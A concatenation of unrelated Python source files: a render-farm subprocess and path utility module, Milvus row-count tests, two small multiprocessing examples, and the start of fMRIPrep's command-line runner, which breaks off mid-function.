if checkErrorFunc:
checkErrorFunc(newErr)
else:
loggingFunc('\n\nError:')
loggingFunc(newErr)
loggingFunc('\n')
# check in to see how we're doing
if time.time() > lastUpdate + checkInInterval:
# only keep the last 10,000 lines of log
out = out[-outputBufferLength:]
err = err[-outputBufferLength:]
lastUpdate = time.time()
if checkInFunc and not checkInFunc(out, err):
try:
process.kill()
except:
loggingFunc('Could not kill, please forcefully close the executing program')
return (False, 'Check in failed')
# if we've been rendering longer than the time alotted, bail
processTime = (int(time.time()) - processStartTime) / 60.0
if timeout and processTime >= timeout:
loggingFunc('Process timed out. Total process time: %.2f min' % processTime)
return (False, 'timed out')
# call wait to kill the zombie process on *nix systems
process.wait()
sys.stdout.flush()
sys.stderr.flush()
newOut = getQueueContents(outQueue, printContents=False)
newErr = getQueueContents(errQueue, printContents=False)
out += newOut
err += newErr
if newOut:
loggingFunc(newOut[:-1])
if newErr and checkErrorFunc:
checkErrorFunc(err)
return (out, err)
def startSubprocess(processArgs, env=None, shell=False):
"""Runs a program through psutil.Popen, disabling Windows error dialogs"""
if env:
env = dict(os.environ.items() + env.items())
else:
env = os.environ
if sys.platform.startswith('win'):
# Don't display the Windows GPF dialog if the invoked program dies.
# See comp.os.ms-windows.programmer.win32
# How to suppress crash notification dialog?, Jan 14,2004 -
# Raymond Chen's response [1]
import ctypes
SEM_NOGPFAULTERRORBOX = 0x0002 # From MSDN
SEM_FAILCRITICALERRORS = 0x0001
try:
# equivalent to 0x0003
ctypes.windll.kernel32.SetErrorMode(SEM_NOGPFAULTERRORBOX | SEM_FAILCRITICALERRORS)
except:
print 'Error setting Windows Error Mode'
raise
CREATE_NO_WINDOW = 0x08000000
subprocess_flags = CREATE_NO_WINDOW
# Here for posterity but this seems to always fail, so not active at the moment
# This is supposed to suppress the Microsoft popup ('submit error to Microsoft')
# try:
# import _winreg
# keyVal = r'SOFTWARE\Microsoft\Windows\Windows Error Reporting'
# try:
# key = _winreg.OpenKey(_winreg.HKEY_LOCAL_MACHINE, keyVal, 0, _winreg.KEY_ALL_ACCESS)
# except:
# key = _winreg.CreateKey(_winreg.HKEY_LOCAL_MACHINE, keyVal)
# # 1 (True) is the value
# _winreg.SetValueEx(key, 'ForceQueue', 0, _winreg.REG_DWORD, 1)
# except:
# print 'Error setting Microsoft Error Reporting, passing...'
else:
subprocess_flags = 0
if type(processArgs) == list:
command = ''
for i in range(len(processArgs)):
# wrap program w/ quotes if it has spaces unless its already wrapped in quotes
if ' ' not in str(processArgs[i]) or \
(str(processArgs[i]).startswith('"') and str(processArgs[i]).endswith('"')):
arg = str(processArgs[i])
else:
if '"' in str(processArgs[i]):
arg = '"' + str(processArgs[i]).replace('"', '\\"') + '"'
else:
arg = '"' + str(processArgs[i]) + '"'
command += arg + ' '
else:
command = processArgs
print 'command:\n', command
if isLinux():
if type(processArgs) == list:
strProcessArgs = []
for i in range(len(processArgs)):
strProcessArgs.append(str(processArgs[i]))
command = strProcessArgs
else:
command = processArgs
return psutil.Popen(
command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env,
shell=shell,
creationflags=subprocess_flags)
def getCmdline(proc):
if isWindows():
return proc.cmdline
else:
return proc.cmdline()
# IO
##################################################
def readFile(path):
with open(path) as fileHandle:
return fileHandle.readlines()
def getOS():
if isWindows():
return 'windows'
if isLinux():
return 'linux'
if isMac():
return 'mac'
# OS
##################################################
def isWindows():
'''
Returns whether or not the machine running the command is Windows.
'''
return sys.platform.startswith('win')
def isLinux():
'''
Returns whether or not the machine running the command is Linux.
'''
return sys.platform.startswith('linux')
def isMac():
'''
Returns whether or not the machine running the command is Mac.
'''
return sys.platform.startswith('darwin')
# Command Line Utilities
##################################################
# fix: shouldn't really be using this, should
# generally call subprocess or some other way
def genArgs(argData):
'''
Generates a string of flag arguments from a dictionary.
Arguments are of the form -k1 v1 -k2 v2
'''
args = ''
for k,v in argData.iteritems():
args += '-%s %s ' % (k,v)
return args[:-1]
# fix: breaks on single dash arguments, improve
def getArgs(args=None):
i = 1
if not args:
args = sys.argv
options = {'__file__':args[0]}
while (i < sys.argv.__len__() - 1):
options[args[i].replace('-','').replace(':', '')] = args[i + 1]
i += 2
return options
def getTotalRam():
'''
Get the total system memory in GB on Linux and Windows
From:
http://stackoverflow.com/questions/2017545/get-memory-usage-of-computer-in-windows-with-python
'''
if isLinux():
totalMemory = os.popen('free -m').readlines()[1].split()[1]
return float(totalMemory) / 1024
elif isWindows():
import ctypes
class MemoryUse(ctypes.Structure):
_fields_ = [
('dwLength', ctypes.c_ulong),
('dwMemoryLoad', ctypes.c_ulong),
('ullTotalPhys', ctypes.c_ulonglong),
('ullAvailPhys', ctypes.c_ulonglong),
('ullTotalPageFile', ctypes.c_ulonglong),
('ullAvailPageFile', ctypes.c_ulonglong),
('ullTotalVirtual', ctypes.c_ulonglong),
('ullAvailVirtual', ctypes.c_ulonglong),
('sullAvailExtendedVirtual', ctypes.c_ulonglong),
]
def __init__(self):
# have to initialize this to the size of
# MemoryUse
self.dwLength = ctypes.sizeof(self)
super(MemoryUse, self).__init__()
stat = MemoryUse()
ctypes.windll.kernel32.GlobalMemoryStatusEx(ctypes.byref(stat))
return float(stat.ullTotalPhys) / 1024000000
else:
return 0
def numberOfProcesses():
return multiprocessing.cpu_count()
def findCaseInsensitiveFilename(path, mustExist=False):
'''
Finds a matching filename if one exists
ex:
c:/Some/Folder/awesome.txt
would match the actual file:
c:/some/folder/AWESOME.txt
if mustExist=False would also match
c:/some/folder/NewPath/yeah.txt
'''
path = unixPath(path)
parts = path.split('/')
pathFound = False
for i in range(len(parts)-1):
pathFound = False
searchRoot = '/'.join(parts[0:i+1]) + '/'
fileOrFolderToMatch = parts[i+1].lower()
if not os.path.isdir(searchRoot):
if mustExist:
print searchRoot, 'not a directory'
break
files = os.listdir(searchRoot)
for f in files:
# print 'checking:', f, fileOrFolderToMatch
if f.lower() == fileOrFolderToMatch:
parts[i+1] = f
pathFound = True
if not pathFound:
if mustExist:
print 'Could not find:', fileOrFolderToMatch
break
if mustExist and not pathFound:
return False
return '/'.join(parts)
def followFile(fileObject, waitTime=2):
# go to the end of the file
# the '2' denotes '0 from the end'
fileObject.seek(0, 2)
while True:
line = fileObject.readline()
if not line:
time.sleep(waitTime)
continue
# trim off the last character if it's a new line
if line[-1] == '\n':
line = line[:-1]
yield line
def main():
pass
# root = 'R:/Cadaver/Workspaces/CAD/CAD_055_010/render/v017/'
# files = os.listdir(root)
# files.sort()
# filenames = [root + f for f in files]
# # filenames = [
# # 'R:/Cadaver/Final_Renders/CAD/EXR_Linear/CAD_055_002_v0003/CAD_055_002_v0003.1016.exr',
# # 'R:/Cadaver/Workspaces/CAD/CAD_055_010/render/v017/CAD_055_010_fly.1009.exr',
# # 'C:/ie/shepherd/test/renders/v001/vray.0001.exr',
# # ]
# for filename in filenames:
# print filename
# print isValidEXR(filename)
# print normalizeFramePadding('C:/ACB/DEF/test.0001.exr')
# print normalizeFramePadding('C:/ACB/DEF/test.$F1.exr')
# print normalizeFramePadding('C:/ACB/DEF/test.#########.exr')
# print isValidEXRSequence('R:/Cadaver/Final_Renders/CAD/EXR_Linear/CAD_055_002_v0003/CAD_055_002_v0003.%04d.exr')
# pass
# openFileBrowser('C:/trash/replaceFileText.py')
# allFiles = getFiles('R:/Assets', fileExcludes = ['.*'])
# print '\n'.join(collapseFiles(allFiles))
# filename = 'r:/Blackish_s03/Final_Renders/BLA_308/EXR_Linear/BLA_308_018_020_v0007/BLA_308_018_020_v0007.%04.exr 1000-1048'
# print isFrameRangeText(filename)
# basePath = 'C:/Program Files/Chaos Group/V-Ray/Maya 2016 for x64/vray_netinstall_client_setup.bat'
# casePath = basePath.lower()
# basePath = 'R:/OpticalFlaresLicense.lic'
# casePath = 'r:/opticalFLARESLicense.lic'
# basePath = 'Q:/Users/Grant_Miller/projects/someSweetProject/yeah.py'
# casePath = 'Q:/Users/Grant_Miller/PROJECTS/someSweetProject/yeah.py'
# print basePath
# print findCaseInsensitiveFilename(casePath)
# print findCaseInsensitiveFilename(casePath, mustExist=True)
# print 'total ram:', getTotalRam()
# print normalizeFramePadding('A/B/C.D/e.35.exr')
# print normalizeFramePadding('A/B/C.D/e.5.testing.exr')
# print isValidSequence('sandbox/seq/frame.%04d.exr')
# print getPadding('A/B/C.D/e.5.testing.exr')
# print getPathInfo('test.1.exo.sc')['extension']
# print getHighestVersionFilePath('R:/Test_Project/Workspaces/publish/TPT_0010/3D', 'playblastTest_v0007', 'mb')
# print getFirstFileFromFrameRangeText("n:/my_cache/ramburglar/Aeroplane/Project_Assets/crash/fx/geo/center_secondary_debris_v0045/center_secondary_debris_v0045.1.bgeo.sc")
# print normalizeFramePadding("N:/my_cache/ramburglar/Test_Project/Workspaces/houdini_alembic/cache/pieces/v002/pieces.0001.abc")
# print getFrameRange('n:/my_cache/ramburglar/Aeroplane/Project_Assets/crash/fx/geo/center_secondary_debris_v0045/center_secondary_debris_v0045.%d.bgeo.sc')
# print getFrameRange('N:/my_cache/ramburglar/Test_Project/Workspaces/houdini_alembic/cache/pieces/v002/pieces.%04d.abc')
# print getExtension('A/B/C.abc')
# print getExtension('A/B/C.bgeo.sc')
# print getPadding('r:/Detour_s03/Workspaces/TD_303/TD_303_002_020/Plates/A_AlexaLog_v02/TD_303_002_020_A_AlexaLog_v02.1005.dpx')
if __name__ == '__main__':
main()
# startSubprocess(['source "/ie/shepherd/shepherd/jobTypes/maya/preRenderLinux.mel";'])
|
test_table_count.py
|
import random
import pdb
import pytest
import logging
import itertools
from time import sleep
from multiprocessing import Process
from milvus import Milvus
from utils import *
from milvus import IndexType, MetricType
dim = 128
index_file_size = 10
add_time_interval = 5
class TestTableCount:
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
5000,
100000,
],
)
def add_vectors_nb(self, request):
yield request.param
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_simple_index_params()
)
def get_simple_index_params(self, request, args):
if "internal" not in args:
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in open source")
return request.param
def test_table_rows_count(self, connect, table, add_vectors_nb):
'''
target: test table rows_count is correct or not
method: create table and add vectors in it,
assert the value returned by get_table_row_count method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nb = add_vectors_nb
vectors = gen_vectors(nb, dim)
res = connect.add_vectors(table_name=table, records=vectors)
time.sleep(add_time_interval)
status, res = connect.get_table_row_count(table)
assert res == nb
def test_table_rows_count_after_index_created(self, connect, table, get_simple_index_params):
'''
target: test get_table_row_count, after index have been created
method: add vectors in db, and create index, then calling get_table_row_count with correct params
expected: get_table_row_count raise exception
'''
nb = 100
index_params = get_simple_index_params
vectors = gen_vectors(nb, dim)
res = connect.add_vectors(table_name=table, records=vectors)
time.sleep(add_time_interval)
# logging.getLogger().info(index_params)
connect.create_index(table, index_params)
status, res = connect.get_table_row_count(table)
assert res == nb
@pytest.mark.level(2)
def test_count_without_connection(self, table, dis_connect):
'''
target: test get_table_row_count, without connection
method: calling get_table_row_count with correct params, with a disconnected instance
expected: get_table_row_count raise exception
'''
with pytest.raises(Exception) as e:
status = dis_connect.get_table_row_count(table)
def test_table_rows_count_no_vectors(self, connect, table):
'''
target: test table rows_count is correct or not, if table is empty
method: create table and no vectors in it,
assert the value returned by get_table_row_count method is equal to 0
expected: the count is equal to 0
'''
table_name = gen_unique_str()
param = {'table_name': table_name,
'dimension': dim,
'index_file_size': index_file_size}
connect.create_table(param)
status, res = connect.get_table_row_count(table)
assert res == 0
# TODO: enable
@pytest.mark.level(2)
@pytest.mark.timeout(20)
def _test_table_rows_count_multiprocessing(self, connect, table, args):
'''
target: test table rows_count is correct or not with multiprocess
method: create table and add vectors in it,
assert the value returned by get_table_row_count method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nq = 2
uri = "tcp://%s:%s" % (args["ip"], args["port"])
vectors = gen_vectors(nq, dim)
res = connect.add_vectors(table_name=table, records=vectors)
time.sleep(add_time_interval)
def rows_count(milvus):
status, res = milvus.get_table_row_count(table)
logging.getLogger().info(status)
assert res == nq
process_num = 8
processes = []
for i in range(process_num):
milvus = Milvus()
milvus.connect(uri=uri)
p = Process(target=rows_count, args=(milvus, ))
processes.append(p)
p.start()
logging.getLogger().info(p)
for p in processes:
p.join()
def test_table_rows_count_multi_tables(self, connect):
'''
target: test table rows_count is correct or not with multiple tables of L2
method: create table and add vectors in it,
assert the value returned by get_table_row_count method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nq = 100
vectors = gen_vectors(nq, dim)
table_list = []
for i in range(20):
table_name = gen_unique_str()
table_list.append(table_name)
param = {'table_name': table_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.L2}
connect.create_table(param)
res = connect.add_vectors(table_name=table_name, records=vectors)
time.sleep(2)
for i in range(20):
status, res = connect.get_table_row_count(table_list[i])
assert status.OK()
assert res == nq
class TestTableCountIP:
"""
params means different nb, the nb value may trigger merge, or not
"""
@pytest.fixture(
scope="function",
params=[
1,
5000,
100000,
],
)
def add_vectors_nb(self, request):
yield request.param
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_simple_index_params()
)
def get_simple_index_params(self, request, args):
if "internal" not in args:
if request.param["index_type"] == IndexType.IVF_SQ8H:
pytest.skip("sq8h not support in open source")
return request.param
def test_table_rows_count(self, connect, ip_table, add_vectors_nb):
'''
target: test table rows_count is correct or not
method: create table and add vectors in it,
assert the value returned by get_table_row_count method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nb = add_vectors_nb
vectors = gen_vectors(nb, dim)
res = connect.add_vectors(table_name=ip_table, records=vectors)
time.sleep(add_time_interval)
status, res = connect.get_table_row_count(ip_table)
assert res == nb
def test_table_rows_count_after_index_created(self, connect, ip_table, get_simple_index_params):
'''
target: test get_table_row_count, after index have been created
method: add vectors in db, and create index, then calling get_table_row_count with correct params
expected: get_table_row_count raise exception
'''
nb = 100
index_params = get_simple_index_params
vectors = gen_vectors(nb, dim)
res = connect.add_vectors(table_name=ip_table, records=vectors)
time.sleep(add_time_interval)
# logging.getLogger().info(index_params)
connect.create_index(ip_table, index_params)
status, res = connect.get_table_row_count(ip_table)
assert res == nb
@pytest.mark.level(2)
def test_count_without_connection(self, ip_table, dis_connect):
'''
target: test get_table_row_count, without connection
method: calling get_table_row_count with correct params, with a disconnected instance
expected: get_table_row_count raise exception
'''
with pytest.raises(Exception) as e:
status = dis_connect.get_table_row_count(ip_table)
def test_table_rows_count_no_vectors(self, connect, ip_table):
'''
target: test table rows_count is correct or not, if table is empty
method: create table and no vectors in it,
assert the value returned by get_table_row_count method is equal to 0
expected: the count is equal to 0
'''
table_name = gen_unique_str("test_table")
param = {'table_name': table_name,
'dimension': dim,
'index_file_size': index_file_size}
connect.create_table(param)
status, res = connect.get_table_row_count(ip_table)
assert res == 0
@pytest.mark.timeout(60)
def test_table_rows_count_multiprocessing(self, connect, ip_table, args):
'''
target: test table rows_count is correct or not with multiprocess
method: create table and add vectors in it,
assert the value returned by get_table_row_count method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nq = 2
uri = "tcp://%s:%s" % (args["ip"], args["port"])
vectors = gen_vectors(nq, dim)
res = connect.add_vectors(table_name=ip_table, records=vectors)
time.sleep(add_time_interval)
def rows_count(milvus):
status, res = milvus.get_table_row_count(ip_table)
logging.getLogger().info(status)
assert res == nq
process_num = 8
processes = []
for i in range(process_num):
milvus = Milvus()
milvus.connect(uri=uri)
p = Process(target=rows_count, args=(milvus,))
processes.append(p)
p.start()
logging.getLogger().info(p)
for p in processes:
p.join()
def test_table_rows_count_multi_tables(self, connect):
'''
target: test table rows_count is correct or not with multiple tables of IP
method: create table and add vectors in it,
assert the value returned by get_table_row_count method is equal to length of vectors
expected: the count is equal to the length of vectors
'''
nq = 100
vectors = gen_vectors(nq, dim)
table_list = []
for i in range(20):
table_name = gen_unique_str('test_table_rows_count_multi_tables')
table_list.append(table_name)
param = {'table_name': table_name,
'dimension': dim,
'index_file_size': index_file_size,
'metric_type': MetricType.IP}
connect.create_table(param)
res = connect.add_vectors(table_name=table_name, records=vectors)
time.sleep(2)
for i in range(20):
status, res = connect.get_table_row_count(table_list[i])
assert status.OK()
assert res == nq
|
start_method_test.py
|
# coding: utf-8
#########################################################################
# 网站: <a href="http://www.crazyit.org">疯狂Java联盟</a> #
# author yeeku.H.lee kongyeeku@163.com #
# #
# version 1.0 #
# #
# Copyright (C), 2001-2018, yeeku.H.Lee #
# #
# This program is protected by copyright laws. #
# #
# Program Name: #
# #
# <br>Date: #
#########################################################################
import multiprocessing
import os
def foo(q):
print('被启动的新进程: (%s)' % os.getpid())
q.put('Python')
if __name__ == '__main__':
# 设置使用fork方式启动进程
multiprocessing.set_start_method('spawn')
q = multiprocessing.Queue()
# 创建进程
mp = multiprocessing.Process(target=foo, args=(q, ))
# 启动进程
mp.start()
# 获取队列中的消息
print(q.get())
mp.join()
|
simple_processing.py
|
import multiprocessing as mp
import time
def suma(r):
pid = mp.current_process().name;
print("{} is working with {}".format(pid, r))
res = q.get()
for i in r:
res += i
q.put(res)
if __name__ == '__main__':
# sequential processing:
t = time.time()
result = 0
suma(range(100_000_000))
print(result)
print("Sequential Processing took: ", time.time() - t)
# multi-processes processing:
t = time.time()
q = mp.Queue()
q.put(0)
pr1 = mp.Process(target=suma, args=(range(5_000_000),))
pr2 = mp.Process(target=suma, args=(range(5_000_000,100_000_000 ),))
pr1.start()
pr2.start()
pr1.join()
pr2.join()
print(result)
print("Threaded Processing took: ", time.time() - t)
|
run.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
fMRI preprocessing workflow
=====
"""
import os
import os.path as op
import logging
import sys
import gc
import uuid
import warnings
from argparse import ArgumentParser
from argparse import RawTextHelpFormatter
from multiprocessing import cpu_count
from time import strftime
import nibabel
nibabel.arrayproxy.KEEP_FILE_OPEN_DEFAULT = 'auto'
logging.addLevelName(25, 'IMPORTANT') # Add a new level between INFO and WARNING
logging.addLevelName(15, 'VERBOSE') # Add a new level between INFO and DEBUG
logger = logging.getLogger('cli')
def _warn_redirect(message, category, filename, lineno, file=None, line=None):
logger.warning('Captured warning (%s): %s', category, message)
def get_parser():
"""Build parser object"""
from ..info import __version__
verstr = 'fmriprep v{}'.format(__version__)
parser = ArgumentParser(description='FMRIPREP: fMRI PREProcessing workflows',
formatter_class=RawTextHelpFormatter)
# Arguments as specified by BIDS-Apps
# required, positional arguments
# IMPORTANT: they must go directly with the parser object
parser.add_argument('bids_dir', action='store',
help='the root folder of a BIDS valid dataset (sub-XXXXX folders should '
'be found at the top level in this folder).')
parser.add_argument('output_dir', action='store',
help='the output path for the outcomes of preprocessing and visual '
'reports')
parser.add_argument('analysis_level', choices=['participant'],
help='processing stage to be run, only "participant" in the case of '
'FMRIPREP (see BIDS-Apps specification).')
# optional arguments
parser.add_argument('--version', action='version', version=verstr)
g_bids = parser.add_argument_group('Options for filtering BIDS queries')
g_bids.add_argument('--participant_label', '--participant-label', action='store', nargs='+',
help='a space delimited list of participant identifiers or a single '
'identifier (the sub- prefix can be removed)')
# Re-enable when option is actually implemented
# g_bids.add_argument('-s', '--session-id', action='store', default='single_session',
# help='select a specific session to be processed')
# Re-enable when option is actually implemented
# g_bids.add_argument('-r', '--run-id', action='store', default='single_run',
# help='select a specific run to be processed')
g_bids.add_argument('-t', '--task-id', action='store',
help='select a specific task to be processed')
g_perfm = parser.add_argument_group('Options to handle performance')
g_perfm.add_argument('--debug', action='store_true', default=False,
help='run debug version of workflow')
g_perfm.add_argument('--nthreads', '--n_cpus', '-n-cpus', action='store', default=0, type=int,
help='maximum number of threads across all processes')
g_perfm.add_argument('--omp-nthreads', action='store', type=int, default=0,
help='maximum number of threads per-process')
g_perfm.add_argument('--mem_mb', '--mem-mb', action='store', default=0, type=int,
help='upper bound memory limit for FMRIPREP processes')
g_perfm.add_argument('--low-mem', action='store_true',
help='attempt to reduce memory usage (will increase disk usage '
'in working directory)')
g_perfm.add_argument('--use-plugin', action='store', default=None,
help='nipype plugin configuration file')
g_perfm.add_argument('--anat-only', action='store_true',
help='run anatomical workflows only')
g_perfm.add_argument('--ignore-aroma-denoising-errors', action='store_true',
default=False,
help='ignores the errors ICA_AROMA returns when there '
'are no components classified as either noise or '
'signal')
g_perfm.add_argument("-v", "--verbose", dest="verbose_count", action="count", default=0,
help="increases log verbosity for each occurence, debug level is -vvv")
g_conf = parser.add_argument_group('Workflow configuration')
g_conf.add_argument(
'--ignore', required=False, action='store', nargs="+", default=[],
choices=['fieldmaps', 'slicetiming'],
help='ignore selected aspects of the input dataset to disable corresponding '
'parts of the workflow (a space delimited list)')
g_conf.add_argument(
'--longitudinal', action='store_true',
help='treat dataset as longitudinal - may increase runtime')
g_conf.add_argument(
'--t2s-coreg', action='store_true',
help='If provided with multi-echo BOLD dataset, create T2*-map and perform '
'T2*-driven coregistration. When multi-echo data is provided and this '
'option is not enabled, standard EPI-T1 coregistration is performed '
'using the middle echo.')
g_conf.add_argument('--bold2t1w-dof', action='store', default=9, choices=[6, 9, 12], type=int,
help='Degrees of freedom when registering BOLD to T1w images. '
'9 (rotation, translation, and scaling) is used by '
'default to compensate for field inhomogeneities.')
g_conf.add_argument(
'--output-space', required=False, action='store',
choices=['T1w', 'template', 'fsnative', 'fsaverage', 'fsaverage6', 'fsaverage5'],
nargs='+', default=['template', 'fsaverage5'],
help='volume and surface spaces to resample functional series into\n'
' - T1w: subject anatomical volume\n'
' - template: normalization target specified by --template\n'
' - fsnative: individual subject surface\n'
' - fsaverage*: FreeSurfer average meshes\n'
'this argument can be single value or a space delimited list,\n'
'for example: --output-space T1w fsnative'
)
g_conf.add_argument(
'--force-bbr', action='store_true', dest='use_bbr', default=None,
help='Always use boundary-based registration (no goodness-of-fit checks)')
g_conf.add_argument(
'--force-no-bbr', action='store_false', dest='use_bbr', default=None,
help='Do not use boundary-based registration (no goodness-of-fit checks)')
g_conf.add_argument(
'--template', required=False, action='store',
choices=['MNI152NLin2009cAsym'], default='MNI152NLin2009cAsym',
help='volume template space (default: MNI152NLin2009cAsym)')
g_conf.add_argument(
'--output-grid-reference', required=False, action='store',
help='Deprecated after FMRIPREP 1.0.8. Please use --template-resampling-grid instead.')
g_conf.add_argument(
'--template-resampling-grid', required=False, action='store', default='native',
help='Keyword ("native", "1mm", or "2mm") or path to an existing file. '
'Allows to define a reference grid for the resampling of BOLD images in template '
'space. Keyword "native" will use the original BOLD grid as reference. '
'Keywords "1mm" and "2mm" will use the corresponding isotropic template '
'resolutions. If a path is given, the grid of that image will be used. '
'It determines the field of view and resolution of the output images, '
'but is not used in normalization.')
g_conf.add_argument(
'--medial-surface-nan', required=False, action='store_true', default=False,
help='Replace medial wall values with NaNs on functional GIFTI files. Only '
'performed for GIFTI files mapped to a freesurfer subject (fsaverage or fsnative).')
# ICA_AROMA options
g_aroma = parser.add_argument_group('Specific options for running ICA_AROMA')
g_aroma.add_argument('--use-aroma', action='store_true', default=False,
help='add ICA_AROMA to your preprocessing stream')
g_aroma.add_argument('--aroma-melodic-dimensionality', action='store',
default=None, type=int,
help='set the dimensionality of MELODIC before running'
'ICA-AROMA')
# ANTs options
g_ants = parser.add_argument_group('Specific options for ANTs registrations')
g_ants.add_argument('--skull-strip-template', action='store', default='OASIS',
choices=['OASIS', 'NKI'],
help='select ANTs skull-stripping template (default: OASIS))')
# Fieldmap options
g_fmap = parser.add_argument_group('Specific options for handling fieldmaps')
g_fmap.add_argument('--fmap-bspline', action='store_true', default=False,
help='fit a B-Spline field using least-squares (experimental)')
g_fmap.add_argument('--fmap-no-demean', action='store_false', default=True,
help='do not remove median (within mask) from fieldmap')
# SyN-unwarp options
g_syn = parser.add_argument_group('Specific options for SyN distortion correction')
g_syn.add_argument('--use-syn-sdc', action='store_true', default=False,
help='EXPERIMENTAL: Use fieldmap-free distortion correction')
g_syn.add_argument('--force-syn', action='store_true', default=False,
help='EXPERIMENTAL/TEMPORARY: Use SyN correction in addition to '
'fieldmap correction, if available')
# FreeSurfer options
g_fs = parser.add_argument_group('Specific options for FreeSurfer preprocessing')
g_fs.add_argument(
'--fs-license-file', metavar='PATH', type=os.path.abspath,
help='Path to FreeSurfer license key file. Get it (for free) by registering'
' at https://surfer.nmr.mgh.harvard.edu/registration.html')
# Surface generation xor
g_surfs = parser.add_argument_group('Surface preprocessing options')
g_surfs.add_argument('--no-submm-recon', action='store_false', dest='hires',
help='disable sub-millimeter (hires) reconstruction')
g_surfs_xor = g_surfs.add_mutually_exclusive_group()
g_surfs_xor.add_argument('--cifti-output', action='store_true', default=False,
help='output BOLD files as CIFTI dtseries')
g_surfs_xor.add_argument('--fs-no-reconall', '--no-freesurfer',
action='store_false', dest='run_reconall',
help='disable FreeSurfer surface preprocessing.'
' Note : `--no-freesurfer` is deprecated and will be removed in 1.2.'
' Use `--fs-no-reconall` instead.')
g_other = parser.add_argument_group('Other options')
g_other.add_argument('-w', '--work-dir', action='store',
help='path where intermediate results should be stored')
g_other.add_argument(
'--resource-monitor', action='store_true', default=False,
help='enable Nipype\'s resource monitoring to keep track of memory and CPU usage')
g_other.add_argument(
'--reports-only', action='store_true', default=False,
help='only generate reports, don\'t run workflows. This will only rerun report '
'aggregation, not reportlet generation for specific nodes.')
g_other.add_argument(
'--run-uuid', action='store', default=None,
help='Specify UUID of previous run, to include error logs in report. '
'No effect without --reports-only.')
g_other.add_argument('--write-graph', action='store_true', default=False,
help='Write workflow graph.')
g_other.add_argument('--stop-on-first-crash', action='store_true', default=False,
help='Force stopping on first crash, even if a work directory'
' was specified.')
g_other.add_argument('--notrack', action='store_true', default=False,
help='Opt-out of sending tracking information of this run to '
'the FMRIPREP developers. This information helps to '
'improve FMRIPREP and provides an indicator of real '
'world usage crucial for obtaining funding.')
return parser
def main():
"""Entry point"""
from nipype import logging as nlogging
from multiprocessing import set_start_method, Process, Manager
from ..viz.reports import generate_reports
from ..info import __version__
set_start_method('forkserver')
warnings.showwarning = _warn_redirect
opts = get_parser().parse_args()
# FreeSurfer license
default_license = op.join(os.getenv('FREESURFER_HOME', ''), 'license.txt')
# Precedence: --fs-license-file, $FS_LICENSE, default_license
license_file = opts.fs_license_file or os.getenv('FS_LICENSE', default_license)
if not os.path.exists(license_file):
raise RuntimeError(
'ERROR: a valid license file is required for FreeSurfer to run. '
'FMRIPREP looked for an existing license file at several paths, in this '
'order: 1) command line argument ``--fs-license-file``; 2) ``$FS_LICENSE`` '
'environment variable; and 3) the ``$FREESURFER_HOME/license.txt`` path. '
'Get it (for free) by registering at https://'
'surfer.nmr.mgh.harvard.edu/registration.html')
os.environ['FS_LICENSE'] = license_file
# Retrieve logging level
log_level = int(max(25 - 5 * opts.verbose_count, logging.DEBUG))
# Set logging
logger.setLevel(log_level)
nlogging.getLogger('nipype.workflow').setLevel(log_level)
nlogging.getLogger('nipype.interface').setLevel(log_level)
nlogging.getLogger('nipype.utils').setLevel(log_level)
errno = 0
# Call build_workflow(opts, retval)
with Manager() as mgr:
retval = mgr.dict()
p = Process(target=build_workflow, args=(opts, retval))
p.start()
p.join()
if p.exitcode != 0:
sys.exit(p.exitcode)
fmriprep_wf = retval['workflow']
plugin_settings = retval['plugin_settings']
output_dir = retval['output_dir']
work_dir = retval['work_dir']
subject_list = retval['subject_list']
run_uuid = retval['run_uuid']
retcode = retval['return_code']
if fmriprep_wf is None:
sys.exit(1)
if opts.write_graph:
fmriprep_wf.write_graph(graph2use="colored", format='svg', simple_form=True)
if opts.reports_only:
sys.exit(int(retcode > 0))
# Sentry tracking
if not opts.notrack:
try:
from raven import Client
dev_user = bool(int(os.getenv('FMRIPREP_DEV', 0)))
msg = 'fMRIPrep running%s' % (int(dev_user) * ' [dev]')
client = Client(
'https://d5a16b0c38d84d1584dfc93b9fb1ade6:'
'21f3c516491847af8e4ed249b122c4af@sentry.io/1137693',
release=__version__)
client.captureMessage(message=msg,
level='debug' if dev_user else 'info',
tags={
'run_id': run_uuid,
'npart': len(subject_list),
'type': 'ping',
'dev': dev_user})
except Exception:
pass
# Clean up master process before running workflow, which may create forks
gc.collect()
try:
fmriprep_wf.run(**plugin_settings)
except RuntimeError as e:
if "Workflow did not execute cleanly" in str(e):
errno = 1
else:
raise
# Generate reports phase
errno += generate_reports(subject_list, output_dir, work_dir, run_uuid)
sys.exit(int(errno > 0))
def build_workflow(opts, retval):
"""
Create the Nipype Workflow that supports the whole execution
graph, given the inputs.
All the checks and the construction of the workflow are done
inside this function that has pickleable inputs and output
dictionary (``retval``) to allow isolation using a
``multiprocessing.Process`` that allows fmriprep to enforce
a hard-limited memory-scope.
"""
from nipype import logging, config as ncfg
from ..info import __version__
from ..workflows.base import init_fmriprep_wf
from ..utils.bids import collect_participants
from ..viz.reports import generate_reports
logger = logging.getLogger('nipype.workflow')
INIT_MSG = """
Running fMRIPREP version {version}:
* BIDS dataset path: {bids_dir}.
* Participant list: {subject_list}.
* Run identifier: {uuid}.
""".format
output_spaces = opts.output_space or []
# Validity of some inputs
# ERROR check if use_aroma was specified, but the correct template was not
if opts.use_aroma and (opts.template != 'MNI152NLin2009cAsym' or
'template' not in output_spaces):
output_spaces.append('template')
logger.warning(
'Option "--use-aroma" requires functional images to be resampled to MNI space. '
'The argument "template" has been automatically added to the list of output '
'spaces (option "--output-space").'
)
# Check output_space
if 'template' not in output_spaces and (opts.use_syn_sdc or opts.force_syn):
msg = ['SyN SDC correction requires T1 to MNI registration, but '
'"template" is not specified in "--output-space" arguments.',
'Option --use-syn will be cowardly dismissed.']
if opts.force_syn:
output_spaces.append('template')
msg[1] = (' Since --force-syn has been requested, "template" has been added to'
